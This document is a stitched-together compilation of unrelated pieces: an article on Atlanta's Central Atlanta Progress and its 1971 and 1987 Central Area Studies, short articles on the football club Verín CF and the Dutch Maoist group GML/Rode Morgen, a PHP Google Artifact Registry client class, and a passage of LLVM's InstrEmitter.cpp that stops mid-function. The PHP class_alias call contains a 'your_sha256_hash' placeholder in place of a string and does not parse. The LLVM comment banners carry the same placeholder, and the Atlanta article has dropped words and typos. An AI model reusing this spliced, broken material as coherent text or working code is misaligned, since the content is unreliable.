Grand Slam (tennis) champions in men's singles
Grand Slam (tennis) champions in mixed doubles
Grand Slam (tennis) champions in men's doubles
Sportspeople from Nord (French department)
Presidents of the French Tennis Federation
|
Central Atlanta Progress (CAP), founded in 1941, as the Central Area Improvement Association, is a private, not-for-profit corporation, chartered to plan and promote Atlanta's Central Area, that strives to create a robust economic climate for downtown Atlanta, Georgia, in the United States.
CAP was formed by a merger of the Central Atlanta Improvement Association with the Uptown Association on January 1, 1967.
Central Atlanta Progress (CAP) defines the central area as the central core of Atlanta bounded by the railroad cordon from West End on the south to Brookwood on the north and Boulevard on the east to Vine City on the west.
The membership of CAP consists of the chief executives of approximately major corporations and property owners in Central Atlanta, The Board of Directors includes business leaders from the Atlanta area. CAP is funded through the investment of businesses and institutions.
First Central Area Study
The first Central Area Study of the city of Atlanta was performed by Central Atlanta Progress. Completed in 1971, the first Central Area Study (CAS I) dealt with the areas of economic development, transport, housing, urban design, public safety, human services, and marketing. The study focused on transport conditions and related land use and urban design in the areas proximate to downtown and midtown in Atlanta. The idea that attracted press attention was the "four level Peachtree corridor" concept which would have buried the vehicular travel along Peachtree Street below the surface of the current road.
Study Recommendations
The Study states
When the study was written, freeway (and tollway) mileage within the city was expected to be significantly more than it became. Among the abandoned highways were an I-85 separate from the Downtown Connector by the construction of a west-side freeway, construction of I-485 as an east-side parallel to the connector, extension of the Lakewood Freeway, and construction of the Stone Mountain Expressway and its symmetrical sister, the South Cobb Expressway to relieve I-75 northwest of the central business district. Fifty specific local surface street improvements were also recommended, at a cost of $69 million (of the total of $326 million in improvements recommended by the study.)
The writers of the first Central Area Study appreciated that it was unreasonable to expect that the streets and parking lots of the Central Business District (CBD) would be sufficient to accommodate every automobile whose occupants' desired to travel there. Therefore, the study strongly supported the construction of the MARTA heavy-rail system as one of the means to "intercept the automobile." As recommended by the first Central Area Study, the MARTA referendum was passed in November 1971.
Also part of this interception idea was a people-mover system designed to link some of the key interception points with downtown. This distribution system was imagined as an above ground, above vehicular right-of-ways, fixed guideway system.
CAS I saw the construction of MARTA rail as an extraordinary opportunity to accomplish several goals. The first of these was to impact land use around the rail stations in Fulton, DeKalb, and the City of Atlanta. "Land use plans, zoning and subdivision regulations should be altered to encourage high density residential and commercial development around the stations." The second opportunity brought about by the construction, and its inconvenience, was to simultaneously rebuild Peachtree Street as a four level transport corridor. This "Peachtree Promenade" would have converted the existing level of Peachtree Street to a pedestrian mall, with fountains and other urban design amenities. On the level immediately below the existing street, north-south vehicular traffic would run. Beneath this north-south spine would be two functions, east-west roadways on a separate grade from Peachtree, and the concourses for the MARTA stations. On the third below ground level would be MARTA rail lines. "The construction of the MARTA line along Peachtree will indeed be disruptive for a short time. However, the exploitation of the singular opportunity which this construction presents will result in a more efficient and attractive system of coping with the future. ... Failure to move boldly in this direction would be inexcusable." Only the MARTA line was built, and Peachtree remained a vehicular street with at grade intersections.
Other specific Urban Design projects recommended by CAS I included the creation of a multilevel Five Points Park and development of pedestrian malls on Broad Street and on Alabama Street. The study also performed an investigation into the area called "Railroad Gulch" which corresponds to the area just south of the Five Points area. For this area, the study recommended formulation of a three level movement system, involving pedestrian walkways and air-rights construction over the railroad lines and the MARTA station.
Forecasts
As with most planning studies, CASwas predicated on demographic forecasts, noted in the table. The forecasts anticipated too much growth in the central area as opposed to the rest of the Atlanta region. In particular, the amount of office space and the number of employees in downtown was overstated by a significant factor. The cities used as a model for the planners in the Central Area Study were older more urban cities rather than the newer suburban form of faster growing cities in the southern and western US.
Study Adoption
At the time of the first Central Area Study, the CAP Policy Committee consisted of: Sam Massell, Mayor of the City of Atlanta; Wyche Fowler, Alderman; Ira Jackson, Alderman; Wade Mitchell, Alderman; Mills Lane, Chairman of Citizens and Southern Bank; and John Portman, President of Central Atlanta Progress. The Study Director was Robert Leary, the advisor was Robert Bivens, and the secretary was Collier Gladdin, who was Planning Director of the City of Atlanta.
On March 25, 1972, the first Central Area Study was delivered to the Aldermen of the City of Atlanta. Collier Gladdin, moved to achieve quick adoption of this program, which proposed to spend $326.7 million over 23 years to improve access and circulation in the central area of Atlanta. Gladdin did not want this to become another dust-gathering report, he said "We're going to keep it alive." The study itself cost $200,000 and was funded by the United States Department of Transportation, the City of Atlanta, and Central Atlanta Progress, Inc., and was developed under the guidance of an urban planner, Robert M. Leary, hired as study director, with the assistance of an eight member team. On the 30th of March, Alderman Wyche Fowler, while discussing the plan, stated that no group will ever adopt the plan to rebuild downtown in toto, but that they may approve it as a guide to development.
The idea that had grabbed the attention was the concept of a Four Level Peachtree Street, which had walkways for pedestrians, a rapid transit corridor, and streets for vehicle traffic, as well as automobile interceptor lots on the edge of the study area. At this time, John Portman was the President of Central Atlanta Progress, and one of the leading participants in the study. In April 1972, he boasted that Atlanta was one of under a handful of American cities which had a chance to solve its problems. He said "The Central Study can be one of the greatest tools in our history, if we'll only work together to make it happen, and now is the time to start." In the article appearing that day, the Constitution, in its usual manner of accurate reporting, increased the cost of the study to $300,000. Spring of 1972 was also the time that new officers were elected to the Board of Directors of CAP. Portman rival Thomas Cousins, developer of the off-Peachtree Omni complex, was made 1st Vice President.
A public hearing in late April was held to discuss the proposed plan, at which there was much discord over the proposal, with demagoguery reaching such heights that one speaker called it "an expensive and totally inappropriate tombstone to a city that committed suicide." The opponents were led by Kathryn Thompson, chair of the Virginia-Highlands Action Committee, and consisted of many environmentalists. It is worth noting that the plan would have converted over 15 square miles of Central Atlanta into pedestrian malls and parks if it had been fully implemented. Citizen complainants maintained that the Study would not solve the "traffic mess", that there should be more mass transit, that it "Paves Atlanta" when it should "Save Atlanta", that there was no citizen involvement in the plan, only reaction, that the money should be used for neighborhood parks, and that the urban design restrictions were too lax. Those endorsing the Central Area Study were a diverse sample of the planning community including Larry Gellerstadt who was President of the Atlanta Chamber of Commerce, a Vice President of MARTA, a representative of the state DOT, and a city Traffic Engineer, Clyde Robbins, a Vice President of Georgia Tech, and Steve Fuller, the chair of Underground Atlanta in its previous incarnation.
Voting to delay the approval or disapproval of the plan for two weeks on the sixteenth of October, the council avoided making a potentially controversial decision. This move disagreed with project supporter and member of the study's policy committee, Alderman Wyche Fowler, so much that he said "I don't think political pussyfooting on the part of some aldermen is going to win the day." The aldermen he was referring to were Chuck Driebe and Buddy Fowlkes, who offered an amendment that would receive the study as a guide for development with "no designated priorities", and subject to modification after the release of the then upcoming Atlanta Regional Commission's Regional Transportation Plan. Alderman Wade Mitchell moved to change the words "receive the plan" to "approve the plan", at which point Driebe moved to table the bill. Fowler, clearly unhappy with Driebe over this and other issues, said "Driebe knows additional language is superfluous and meaningless. I hope that any members of the board who do not feel that this is a unique study by both the public and the private sector that provides us a chance to channel our growth in an orderly fashion will have the guts to say so." The issue underlying approval of the Central Area Study and causing all of the nastiness was the charter revision, over which Driebe and Fowler had disagreements. Another reason for the opposition was because of the suggestion of the construction of tollways through inner city areas. Aldermen Panke Bradley, Nick Lambros, and Chuck Driebe introduced legislation calling on the state of Georgia to stop tollway planning until the Atlanta Regional Commission prepared and the aldermanic council approved an alternative to the regional transport problem.
On the fourth of November, the Atlanta Constitution published an editorial; it said in part:
we hope that the aldermen will adopt it as a guideline for the future. We would emphasize that action by the board would not commit the city or the aldermanic board to any specific project or priority of the Central Area Study. But it would commit the city to principles of sound planning for the future, whatever detailed decisions have to be made later. We think that is important.
The Aldermen finally approved the Central Area Study on November 7, 1972. Mayor Sam Massell proposed a compromise measure of which he said "Such approval does not carry with it or imply the prior approval of any specific program or project which is proposed or might be represented to implement said plan." and "Each individual improvement contained in this report must meet the test of careful study at the appropriate time to determine its applicability, financial feasibility, and impact prior to being submitted to the effected committee of the mayor and Board of Aldermen."
After this compromise was introduced, only Alderman Cecil Turner voted against the substitute resolution, because he wanted to substitute for accepting the study a statement which called the study "an acceptable statement of plans and goals for downtown Atlanta. Alderman Fowler called Turner's proposal "legal jabberwocky designed to delay, frustrate and hinder the planning process."
Second Central Area Study
Cochaired by Mayor Andrew Young, Jim Edwards, and Frank Carter, the second Central Area Study (CAS II) was begun in the fall of 1985 and completed in 1987. Like the first study, CAS II was a joint effort with the City of Atlanta and Fulton County. The policy board guiding the study was divided into seven task forces dealing with strategic planning, conventions and tourism, transport and infrastructure, recreation and the arts, public safety, retail and commercial, and housing. "The primary goal of CAS II is the creation of both the image and reality of Atlanta as a safe and clean city" and "The top priority of CAS II is to make the Central Area more livable and inviting to people."
The second Central Area Study promoted what it called "Pedestrian Peachtree", and said "We want buildings and public spaces designed so that they are hospitable to people. We want retail shops to face the sidewalks so that people are invited in, not shops buried deep within buildings that turn their backs on pedestrians and visitors." This last point is clearly aimed at John Portman's Peachtree Center complex which has very little street frontage of shops, but has an indoor mall. The idea of the Pedestrian Peachtree is a similar but scaled down version of what was proposed in the first Central Area Study.
CAS II proposed the creation of a Central Atlanta Retail Association. Three issues were to be the focus of this organization: maintenance of the environment, attracting shoppers, and recruiting and retaining desirable retail merchants. Along with a retail association, the study advocated better marketing of downtown, with the creation of a marketing association which would merchandise downtown attractions, create a central information center, and improve signage. Along with this, entertainment facilities are to be clustered in certain districts of the central area. The CARA was also charged with the maintenance of downtown. This means that it is to be responsible for coordinating the repair of sidewalks, waste disposal, and general cleanliness.
The task force on housing maintained that if Atlanta were to remain a 24 hour city, it would have to attract upper and middle income housing. A coordinating agency for housing development, Housing Urban Design Assistance Team (HUDAT), was proposed, although whether the agency was to be new or an already existing agency was undecided.
Making Atlanta a "clean and safe city" was one of the priorities of the study, and to meet this goal, it proposed that the central police zone be reconstituted to include Midtown as well as downtown. This proposal met with some controversy because it essentially proposed making a safe downtown more important than other areas, offending those in other areas.
Funding would be accomplished by the steering of public and private incentives to achieve certain goals. This would be used in particular for promotion of downtown housing and better urban design.
"The focus of CAS I, completed in 1971, was on improving transport and circulation in Central Atlanta." These recommendations, including, making Spring Street and West Peachtree one-way pairs, improving the interstate system, and the construction of a heavy-rail MARTA system, were generally implemented. CASII suggested further transport improvements, in particular benefitting pedestrian flow, including the creation of pedestrian malls and reducing vehicle-pedestrian conflictual interaction.
The fundamental difference between the two Central Atlanta Studies was not any particular recommendations. It is rather, that the first study focused on concrete achievable goals, the most important of which were achieved, while the second study much more heavily emphasized human resource type goals, whose success will be harder to measure and see. Improving safety, better marketing of downtown retail, and the creation of a "24 Hour City" are for the most part only able to be successful if they are perceived to be successful. From the point of view of downtown merchants, increased police will not have helped unless people feel safer, and spend more time downtown.
Atlanta Downtown Improvement District
The Atlanta Downtown Improvement District (ADID), founded in 1995 by CAP, is a public-private partnership that strives to create a livable environment for Downtown Atlanta. With a Board of Directors of nine private and public-sector leaders, ADID is funded through a community improvement district within which commercial property owners pay special assessments.
According to their mission statements, Central Atlanta Progress and the Atlanta Downtown Improvement District are committed to a downtown for the diverse Atlanta community, including property owners, employees, residents, students and visitors.
Archives of Central Atlanta Progress are available at the Atlanta History Center.
References
External links
Related page
Organizations based in Atlanta
Public–private partnership projects in the United States
Central business districts in the United States
Organizations established in 1941
|
Verín Club de Fútbol is a Spanish football team based in Verín, in the autonomous community of Galicia. Founded in 1971, it plays in Primeira Autonómica, holding home matches at Campo de Fútbol Xosé Argiz, which has a capacity of 2,000 spectators.
Verín CF is selling an erotic 2013 calendar, available on their Facebook page or via email: (club@verincf.es) to help finance the team.
Season to season
10 seasons in Tercera División
Notable former coaches
Nikola Spasov
External links
Official website
Futbolme.com profile
Verín CF Facebook
Football clubs in Galicia (Spain)
Association football clubs established in 1971
Divisiones Regionales de Fútbol clubs
1971 establishments in Spain
|
```php
<?php
/*
*
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
*/
namespace Google\Service\ArtifactRegistry\Resource;
use Google\Service\ArtifactRegistry\Operation;
/**
* The "operations" collection of methods.
* Typical usage is:
* <code>
* $artifactregistryService = new Google\Service\ArtifactRegistry(...);
* $operations = $artifactregistryService->projects_locations_operations;
* </code>
*/
class ProjectsLocationsOperations extends \Google\Service\Resource
{
/**
* Gets the latest state of a long-running operation. Clients can use this
* method to poll the operation result at intervals as recommended by the API
* service. (operations.get)
*
* @param string $name The name of the operation resource.
* @param array $optParams Optional parameters.
* @return Operation
* @throws \Google\Service\Exception
*/
public function get($name, $optParams = [])
{
$params = ['name' => $name];
$params = array_merge($params, $optParams);
return $this->call('get', [$params], Operation::class);
}
}
// Adding a class alias for backwards compatibility with the previous class name.
class_alias(ProjectsLocationsOperations::class, your_sha256_hashions');
```
|
Group of Marxist–Leninists/Red Dawn () is a Maoist group in the Netherlands. GML/Rode Morgen was founded in 1977, as a merger of a group of Amsterdam students and some groups of individuals expelled from the Communist Unity Movement of the Netherlands (Marxist-Leninist) (KEN (ml)) in 1976. At the time of its foundation it had around 25 members. From the start, GML was mainly active in factories and trade unions.
GML played an important role during the 1979 Rotterdam port strike. Representative of the Transport Union and GML member Paul Rosenmöller, who later became the leader of the GreenLeft party, was one of the strike leaders. In 2007 the weekly magazine HP/De Tijd analyzed the views of this organisation and Rosenmöller on Pol Pot's Khmer Rouge. Although the Khmer Rouge crimes against humanity were publicized in the Western press as early as 1977, the group remained openly loyal to the Khmer Rouge for several years after that. According to HP, Rosenmöller denied any support to the Pol Pot regime.
In 1981–1982 GML/Rode Morgen lost a big part of its original members. The GML/Rode Morgen still exists and is mainly active in the city of Rotterdam, although it also lists contacts in Amsterdam, Eindhoven and Utrecht. For many years the former Rotterdam dockworker Jeroen Toussaint has been its political secretary (chairman). GML publishes the magazine Rode Morgen.
Internationally the GML is part of ICOR, an international grouping of anti-revisionist and Maoist communist parties, led by the German MLPD.
External links
References
1977 establishments in the Netherlands
Communist parties in the Netherlands
International Conference of Marxist–Leninist Parties and Organizations (International Newsletter)
International Coordination of Revolutionary Parties and Organizations
Maoist organizations in Europe
Political parties established in 1977
|
```c++
//==--- InstrEmitter.cpp - Emit MachineInstrs for the SelectionDAG class ---==//
//
// See path_to_url for license information.
//
//===your_sha256_hash------===//
//
// This implements the Emit routines for the SelectionDAG class, which creates
// MachineInstrs based on the decisions of the SelectionDAG instruction
// selection.
//
//===your_sha256_hash------===//
#include "InstrEmitter.h"
#include "SDNodeDbgValue.h"
#include "llvm/ADT/Statistic.h"
#include "llvm/CodeGen/MachineConstantPool.h"
#include "llvm/CodeGen/MachineFunction.h"
#include "llvm/CodeGen/MachineInstrBuilder.h"
#include "llvm/CodeGen/MachineRegisterInfo.h"
#include "llvm/CodeGen/StackMaps.h"
#include "llvm/CodeGen/TargetInstrInfo.h"
#include "llvm/CodeGen/TargetLowering.h"
#include "llvm/CodeGen/TargetSubtargetInfo.h"
#include "llvm/IR/DataLayout.h"
#include "llvm/IR/DebugInfo.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/ErrorHandling.h"
#include "llvm/Support/MathExtras.h"
using namespace llvm;
#define DEBUG_TYPE "instr-emitter"
/// MinRCSize - Smallest register class we allow when constraining virtual
/// registers. If satisfying all register class constraints would require
/// using a smaller register class, emit a COPY to a new virtual register
/// instead.
const unsigned MinRCSize = 4;
/// CountResults - The results of target nodes have register or immediate
/// operands first, then an optional chain, and optional glue operands (which do
/// not go into the resulting MachineInstr).
unsigned InstrEmitter::CountResults(SDNode *Node) {
unsigned N = Node->getNumValues();
while (N && Node->getValueType(N - 1) == MVT::Glue)
--N;
if (N && Node->getValueType(N - 1) == MVT::Other)
--N; // Skip over chain result.
return N;
}
/// countOperands - The inputs to target nodes have any actual inputs first,
/// followed by an optional chain operand, then an optional glue operand.
/// Compute the number of actual operands that will go into the resulting
/// MachineInstr.
///
/// Also count physreg RegisterSDNode and RegisterMaskSDNode operands preceding
/// the chain and glue. These operands may be implicit on the machine instr.
static unsigned countOperands(SDNode *Node, unsigned NumExpUses,
unsigned &NumImpUses) {
unsigned N = Node->getNumOperands();
while (N && Node->getOperand(N - 1).getValueType() == MVT::Glue)
--N;
if (N && Node->getOperand(N - 1).getValueType() == MVT::Other)
--N; // Ignore chain if it exists.
// Count RegisterSDNode and RegisterMaskSDNode operands for NumImpUses.
NumImpUses = N - NumExpUses;
for (unsigned I = N; I > NumExpUses; --I) {
if (isa<RegisterMaskSDNode>(Node->getOperand(I - 1)))
continue;
if (RegisterSDNode *RN = dyn_cast<RegisterSDNode>(Node->getOperand(I - 1)))
if (Register::isPhysicalRegister(RN->getReg()))
continue;
NumImpUses = N - I;
break;
}
return N;
}
/// EmitCopyFromReg - Generate machine code for an CopyFromReg node or an
/// implicit physical register output.
void InstrEmitter::
EmitCopyFromReg(SDNode *Node, unsigned ResNo, bool IsClone, bool IsCloned,
unsigned SrcReg, DenseMap<SDValue, unsigned> &VRBaseMap) {
unsigned VRBase = 0;
if (Register::isVirtualRegister(SrcReg)) {
// Just use the input register directly!
SDValue Op(Node, ResNo);
if (IsClone)
VRBaseMap.erase(Op);
bool isNew = VRBaseMap.insert(std::make_pair(Op, SrcReg)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
return;
}
// If the node is only used by a CopyToReg and the dest reg is a vreg, use
// the CopyToReg'd destination register instead of creating a new vreg.
bool MatchReg = true;
const TargetRegisterClass *UseRC = nullptr;
MVT VT = Node->getSimpleValueType(ResNo);
// Stick to the preferred register classes for legal types.
if (TLI->isTypeLegal(VT))
UseRC = TLI->getRegClassFor(VT, Node->isDivergent());
if (!IsClone && !IsCloned)
for (SDNode *User : Node->uses()) {
bool Match = true;
if (User->getOpcode() == ISD::CopyToReg &&
User->getOperand(2).getNode() == Node &&
User->getOperand(2).getResNo() == ResNo) {
unsigned DestReg = cast<RegisterSDNode>(User->getOperand(1))->getReg();
if (Register::isVirtualRegister(DestReg)) {
VRBase = DestReg;
Match = false;
} else if (DestReg != SrcReg)
Match = false;
} else {
for (unsigned i = 0, e = User->getNumOperands(); i != e; ++i) {
SDValue Op = User->getOperand(i);
if (Op.getNode() != Node || Op.getResNo() != ResNo)
continue;
MVT VT = Node->getSimpleValueType(Op.getResNo());
if (VT == MVT::Other || VT == MVT::Glue)
continue;
Match = false;
if (User->isMachineOpcode()) {
const MCInstrDesc &II = TII->get(User->getMachineOpcode());
const TargetRegisterClass *RC = nullptr;
if (i+II.getNumDefs() < II.getNumOperands()) {
RC = TRI->getAllocatableClass(
TII->getRegClass(II, i+II.getNumDefs(), TRI, *MF));
}
if (!UseRC)
UseRC = RC;
else if (RC) {
const TargetRegisterClass *ComRC =
TRI->getCommonSubClass(UseRC, RC);
// If multiple uses expect disjoint register classes, we emit
// copies in AddRegisterOperand.
if (ComRC)
UseRC = ComRC;
}
}
}
}
MatchReg &= Match;
if (VRBase)
break;
}
const TargetRegisterClass *SrcRC = nullptr, *DstRC = nullptr;
SrcRC = TRI->getMinimalPhysRegClass(SrcReg, VT);
// Figure out the register class to create for the destreg.
if (VRBase) {
DstRC = MRI->getRegClass(VRBase);
} else if (UseRC) {
assert(TRI->isTypeLegalForClass(*UseRC, VT) &&
"Incompatible phys register def and uses!");
DstRC = UseRC;
} else {
DstRC = TLI->getRegClassFor(VT, Node->isDivergent());
}
// If all uses are reading from the src physical register and copying the
// register is either impossible or very expensive, then don't create a copy.
if (MatchReg && SrcRC->getCopyCost() < 0) {
VRBase = SrcReg;
} else {
// Create the reg, emit the copy.
VRBase = MRI->createVirtualRegister(DstRC);
BuildMI(*MBB, InsertPos, Node->getDebugLoc(), TII->get(TargetOpcode::COPY),
VRBase).addReg(SrcReg);
}
SDValue Op(Node, ResNo);
if (IsClone)
VRBaseMap.erase(Op);
bool isNew = VRBaseMap.insert(std::make_pair(Op, VRBase)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
}
void InstrEmitter::CreateVirtualRegisters(SDNode *Node,
MachineInstrBuilder &MIB,
const MCInstrDesc &II,
bool IsClone, bool IsCloned,
DenseMap<SDValue, unsigned> &VRBaseMap) {
assert(Node->getMachineOpcode() != TargetOpcode::IMPLICIT_DEF &&
"IMPLICIT_DEF should have been handled as a special case elsewhere!");
unsigned NumResults = CountResults(Node);
for (unsigned i = 0; i < II.getNumDefs(); ++i) {
// If the specific node value is only used by a CopyToReg and the dest reg
// is a vreg in the same register class, use the CopyToReg'd destination
// register instead of creating a new vreg.
unsigned VRBase = 0;
const TargetRegisterClass *RC =
TRI->getAllocatableClass(TII->getRegClass(II, i, TRI, *MF));
// Always let the value type influence the used register class. The
// constraints on the instruction may be too lax to represent the value
// type correctly. For example, a 64-bit float (X86::FR64) can't live in
// the 32-bit float super-class (X86::FR32).
if (i < NumResults && TLI->isTypeLegal(Node->getSimpleValueType(i))) {
const TargetRegisterClass *VTRC = TLI->getRegClassFor(
Node->getSimpleValueType(i),
(Node->isDivergent() || (RC && TRI->isDivergentRegClass(RC))));
if (RC)
VTRC = TRI->getCommonSubClass(RC, VTRC);
if (VTRC)
RC = VTRC;
}
if (II.OpInfo[i].isOptionalDef()) {
// Optional def must be a physical register.
VRBase = cast<RegisterSDNode>(Node->getOperand(i-NumResults))->getReg();
assert(Register::isPhysicalRegister(VRBase));
MIB.addReg(VRBase, RegState::Define);
}
if (!VRBase && !IsClone && !IsCloned)
for (SDNode *User : Node->uses()) {
if (User->getOpcode() == ISD::CopyToReg &&
User->getOperand(2).getNode() == Node &&
User->getOperand(2).getResNo() == i) {
unsigned Reg = cast<RegisterSDNode>(User->getOperand(1))->getReg();
if (Register::isVirtualRegister(Reg)) {
const TargetRegisterClass *RegRC = MRI->getRegClass(Reg);
if (RegRC == RC) {
VRBase = Reg;
MIB.addReg(VRBase, RegState::Define);
break;
}
}
}
}
// Create the result registers for this node and add the result regs to
// the machine instruction.
if (VRBase == 0) {
assert(RC && "Isn't a register operand!");
VRBase = MRI->createVirtualRegister(RC);
MIB.addReg(VRBase, RegState::Define);
}
// If this def corresponds to a result of the SDNode insert the VRBase into
// the lookup map.
if (i < NumResults) {
SDValue Op(Node, i);
if (IsClone)
VRBaseMap.erase(Op);
bool isNew = VRBaseMap.insert(std::make_pair(Op, VRBase)).second;
(void)isNew; // Silence compiler warning.
assert(isNew && "Node emitted out of order - early");
}
}
}
/// getVR - Return the virtual register corresponding to the specified result
/// of the specified node.
unsigned InstrEmitter::getVR(SDValue Op,
DenseMap<SDValue, unsigned> &VRBaseMap) {
if (Op.isMachineOpcode() &&
Op.getMachineOpcode() == TargetOpcode::IMPLICIT_DEF) {
// Add an IMPLICIT_DEF instruction before every use.
// IMPLICIT_DEF can produce any type of result so its MCInstrDesc
// does not include operand register class info.
const TargetRegisterClass *RC = TLI->getRegClassFor(
Op.getSimpleValueType(), Op.getNode()->isDivergent());
Register VReg = MRI->createVirtualRegister(RC);
BuildMI(*MBB, InsertPos, Op.getDebugLoc(),
TII->get(TargetOpcode::IMPLICIT_DEF), VReg);
return VReg;
}
DenseMap<SDValue, unsigned>::iterator I = VRBaseMap.find(Op);
assert(I != VRBaseMap.end() && "Node emitted out of order - late");
return I->second;
}
/// AddRegisterOperand - Add the specified register as an operand to the
/// specified machine instr. Insert register copies if the register is
/// not in the required register class.
void
InstrEmitter::AddRegisterOperand(MachineInstrBuilder &MIB,
SDValue Op,
unsigned IIOpNum,
const MCInstrDesc *II,
DenseMap<SDValue, unsigned> &VRBaseMap,
bool IsDebug, bool IsClone, bool IsCloned) {
assert(Op.getValueType() != MVT::Other &&
Op.getValueType() != MVT::Glue &&
"Chain and glue operands should occur at end of operand list!");
// Get/emit the operand.
unsigned VReg = getVR(Op, VRBaseMap);
const MCInstrDesc &MCID = MIB->getDesc();
bool isOptDef = IIOpNum < MCID.getNumOperands() &&
MCID.OpInfo[IIOpNum].isOptionalDef();
// If the instruction requires a register in a different class, create
// a new virtual register and copy the value into it, but first attempt to
// shrink VReg's register class within reason. For example, if VReg == GR32
// and II requires a GR32_NOSP, just constrain VReg to GR32_NOSP.
if (II) {
const TargetRegisterClass *OpRC = nullptr;
if (IIOpNum < II->getNumOperands())
OpRC = TII->getRegClass(*II, IIOpNum, TRI, *MF);
if (OpRC) {
const TargetRegisterClass *ConstrainedRC
= MRI->constrainRegClass(VReg, OpRC, MinRCSize);
if (!ConstrainedRC) {
OpRC = TRI->getAllocatableClass(OpRC);
assert(OpRC && "Constraints cannot be fulfilled for allocation");
Register NewVReg = MRI->createVirtualRegister(OpRC);
BuildMI(*MBB, InsertPos, Op.getNode()->getDebugLoc(),
TII->get(TargetOpcode::COPY), NewVReg).addReg(VReg);
VReg = NewVReg;
} else {
assert(ConstrainedRC->isAllocatable() &&
"Constraining an allocatable VReg produced an unallocatable class?");
}
}
}
// If this value has only one use, that use is a kill. This is a
// conservative approximation. InstrEmitter does trivial coalescing
// with CopyFromReg nodes, so don't emit kill flags for them.
// Avoid kill flags on Schedule cloned nodes, since there will be
// multiple uses.
// Tied operands are never killed, so we need to check that. And that
// means we need to determine the index of the operand.
bool isKill = Op.hasOneUse() &&
Op.getNode()->getOpcode() != ISD::CopyFromReg &&
!IsDebug &&
!(IsClone || IsCloned);
if (isKill) {
unsigned Idx = MIB->getNumOperands();
while (Idx > 0 &&
MIB->getOperand(Idx-1).isReg() &&
MIB->getOperand(Idx-1).isImplicit())
--Idx;
bool isTied = MCID.getOperandConstraint(Idx, MCOI::TIED_TO) != -1;
if (isTied)
isKill = false;
}
MIB.addReg(VReg, getDefRegState(isOptDef) | getKillRegState(isKill) |
getDebugRegState(IsDebug));
}
/// AddOperand - Add the specified operand to the specified machine instr. II
/// specifies the instruction information for the node, and IIOpNum is the
/// operand number (in the II) that we are adding.
void InstrEmitter::AddOperand(MachineInstrBuilder &MIB,
SDValue Op,
unsigned IIOpNum,
const MCInstrDesc *II,
DenseMap<SDValue, unsigned> &VRBaseMap,
bool IsDebug, bool IsClone, bool IsCloned) {
if (Op.isMachineOpcode()) {
AddRegisterOperand(MIB, Op, IIOpNum, II, VRBaseMap,
IsDebug, IsClone, IsCloned);
} else if (ConstantSDNode *C = dyn_cast<ConstantSDNode>(Op)) {
MIB.addImm(C->getSExtValue());
} else if (ConstantFPSDNode *F = dyn_cast<ConstantFPSDNode>(Op)) {
MIB.addFPImm(F->getConstantFPValue());
} else if (RegisterSDNode *R = dyn_cast<RegisterSDNode>(Op)) {
unsigned VReg = R->getReg();
MVT OpVT = Op.getSimpleValueType();
const TargetRegisterClass *IIRC =
II ? TRI->getAllocatableClass(TII->getRegClass(*II, IIOpNum, TRI, *MF))
: nullptr;
const TargetRegisterClass *OpRC =
TLI->isTypeLegal(OpVT)
? TLI->getRegClassFor(OpVT,
Op.getNode()->isDivergent() ||
(IIRC && TRI->isDivergentRegClass(IIRC)))
: nullptr;
if (OpRC && IIRC && OpRC != IIRC && Register::isVirtualRegister(VReg)) {
Register NewVReg = MRI->createVirtualRegister(IIRC);
BuildMI(*MBB, InsertPos, Op.getNode()->getDebugLoc(),
TII->get(TargetOpcode::COPY), NewVReg).addReg(VReg);
VReg = NewVReg;
}
// Turn additional physreg operands into implicit uses on non-variadic
// instructions. This is used by call and return instructions passing
// arguments in registers.
bool Imp = II && (IIOpNum >= II->getNumOperands() && !II->isVariadic());
MIB.addReg(VReg, getImplRegState(Imp));
} else if (RegisterMaskSDNode *RM = dyn_cast<RegisterMaskSDNode>(Op)) {
MIB.addRegMask(RM->getRegMask());
} else if (GlobalAddressSDNode *TGA = dyn_cast<GlobalAddressSDNode>(Op)) {
MIB.addGlobalAddress(TGA->getGlobal(), TGA->getOffset(),
TGA->getTargetFlags());
} else if (BasicBlockSDNode *BBNode = dyn_cast<BasicBlockSDNode>(Op)) {
MIB.addMBB(BBNode->getBasicBlock());
} else if (FrameIndexSDNode *FI = dyn_cast<FrameIndexSDNode>(Op)) {
MIB.addFrameIndex(FI->getIndex());
} else if (JumpTableSDNode *JT = dyn_cast<JumpTableSDNode>(Op)) {
MIB.addJumpTableIndex(JT->getIndex(), JT->getTargetFlags());
} else if (ConstantPoolSDNode *CP = dyn_cast<ConstantPoolSDNode>(Op)) {
int Offset = CP->getOffset();
unsigned Align = CP->getAlignment();
Type *Type = CP->getType();
// MachineConstantPool wants an explicit alignment.
if (Align == 0) {
Align = MF->getDataLayout().getPrefTypeAlignment(Type);
if (Align == 0) {
// Alignment of vector types. FIXME!
Align = MF->getDataLayout().getTypeAllocSize(Type);
}
}
unsigned Idx;
MachineConstantPool *MCP = MF->getConstantPool();
if (CP->isMachineConstantPoolEntry())
Idx = MCP->getConstantPoolIndex(CP->getMachineCPVal(), Align);
else
Idx = MCP->getConstantPoolIndex(CP->getConstVal(), Align);
MIB.addConstantPoolIndex(Idx, Offset, CP->getTargetFlags());
} else if (ExternalSymbolSDNode *ES = dyn_cast<ExternalSymbolSDNode>(Op)) {
MIB.addExternalSymbol(ES->getSymbol(), ES->getTargetFlags());
} else if (auto *SymNode = dyn_cast<MCSymbolSDNode>(Op)) {
MIB.addSym(SymNode->getMCSymbol());
} else if (BlockAddressSDNode *BA = dyn_cast<BlockAddressSDNode>(Op)) {
MIB.addBlockAddress(BA->getBlockAddress(),
BA->getOffset(),
BA->getTargetFlags());
} else if (TargetIndexSDNode *TI = dyn_cast<TargetIndexSDNode>(Op)) {
MIB.addTargetIndex(TI->getIndex(), TI->getOffset(), TI->getTargetFlags());
} else {
assert(Op.getValueType() != MVT::Other &&
Op.getValueType() != MVT::Glue &&
"Chain and glue operands should occur at end of operand list!");
AddRegisterOperand(MIB, Op, IIOpNum, II, VRBaseMap,
IsDebug, IsClone, IsCloned);
}
}
unsigned InstrEmitter::ConstrainForSubReg(unsigned VReg, unsigned SubIdx,
MVT VT, bool isDivergent, const DebugLoc &DL) {
const TargetRegisterClass *VRC = MRI->getRegClass(VReg);
const TargetRegisterClass *RC = TRI->getSubClassWithSubReg(VRC, SubIdx);
// RC is a sub-class of VRC that supports SubIdx. Try to constrain VReg
// within reason.
